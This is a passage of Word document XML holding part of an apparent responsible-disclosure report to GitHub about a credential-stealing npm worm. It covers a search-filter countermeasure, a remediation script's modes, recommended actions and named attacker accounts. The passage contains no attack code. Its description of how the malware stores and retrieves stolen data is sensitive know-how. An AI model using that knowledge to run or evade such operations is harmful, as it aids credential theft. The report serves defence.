          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware instances continue committing data successfully (no 4xx triggered), but the attacker's automated search queries return zero results — silently severing their ability to retrieve stolen data from all current and future victims simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Attached Remediation Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attached shaihuld-remediate.sh is designed for both proactive and reactive use:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Solo mode (no arguments): scans, defuses, immunizes, and writes a local IR report. Nothing is transmitted externally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Coordinated mode (--revoke-endpoint=URL): additionally sends a clean-status signal after confirming the threat is gone, enabling the safe revocation flow above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Silent/CI mode (--silent): suppresses stdout for scripted deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit codes are machine-readable: 0 = clean/immunized, 2 = threat found and neutralized. The local IR report is saved to ~/.local/share/ir-reports/ and contains no raw credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement search index filter for the beacon string (Phase 4) — low risk, can be deployed immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Take down or preserve both attacker repositories (PedroTortoriello and g00dfe11ow) — preserve before takedown for forensic value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigate the TeamPCP_OSS organization and enumerate all 68+ fork accounts from the g00dfe11ow repo as potential active deployers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review GitHub token revocation infrastructure for feasibility of a zombie/tarpit state for tokens flagged as deadman-switch-controlled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Publish a GitHub Security Advisory for the known malicious package name(s) so the npm registry can act independently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Researcher Notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This disclosure is made in good faith under coordinated responsible disclosure principles. The attacker repositories were discovered through open-source threat intelligence monitoring — the threat actors publicly advertised the worm themselves. No stolen credentials were exfiltrated during research. All IOCs were derived from static and dynamic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The remediation script and UI dashboard are being released as open-source defensive tooling regardless of whether GitHub implements the zombie token protocol. The script functions safely as a standalone local tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I am happy to provide additional technical detail, sample payloads (redacted), or live demonstration in a controlled environment at GitHub's request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted via: security@github.com and https://github.com/security | HackerOne: breakingcircuit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2026-05-13T10:20:19.085Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-13T10:20:19.085Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>